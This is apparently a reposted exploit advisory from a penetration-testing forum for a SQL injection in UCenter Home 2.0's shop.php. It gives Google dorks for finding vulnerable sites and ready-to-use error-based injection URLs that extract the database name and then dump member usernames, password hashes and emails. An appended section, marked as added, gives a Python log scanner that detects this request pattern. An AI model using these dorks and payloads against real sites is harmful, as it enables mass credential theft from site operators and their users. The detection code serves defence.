China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

You use Hex conversion. And edit your SQL Injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
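
Added example (not part of the original post): a log check that flags the request shape shown above, where shopid on shop.php?ac=view carries anything other than an integer, and labels values containing the error-based markers from the quoted query. The log lines are constructed, classify_shopid and scan are hypothetical names, and treating shopid as a plain integer id is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Feb/2013:21:31:02 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [27/Feb/2013:21:33:40 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(...),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)'
    '%20and%201=1 HTTP/1.1" 200 812',
    '198.51.100.9 - - [27/Feb/2013:21:34:05 +0800] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 790',
    '198.51.100.7 - - [27/Feb/2013:21:35:11 +0800] "GET /index.php?uid=12 HTTP/1.1" 200 4096',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers of the duplicate-key error technique quoted in the post.
ERROR_BASED = re.compile(r"floor\s*\(\s*rand\s*\(|information_schema|group\s+by", re.I)

def classify_shopid(url):
    """Verdict for a shop.php?ac=view request, or None for any other URL."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/shop.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "view" not in query.get("ac", []) or "shopid" not in query:
        return None
    verdict = "ok"
    for value in query["shopid"]:  # check every copy of a repeated parameter
        if value.isascii() and value.isdigit():  # assumption: shopid is an integer id
            continue
        if ERROR_BASED.search(value):
            return "error_based_sqli"
        verdict = "non_numeric"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for each shop.php view request that is not 'ok'."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify_shopid(match.group(1)) if match else None
        if verdict not in (None, "ok"):
            hits.append((number, verdict))
    return hits

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The integer test is the control that matters; the marker regex only labels the hit and should not be relied on as a filter.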





Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2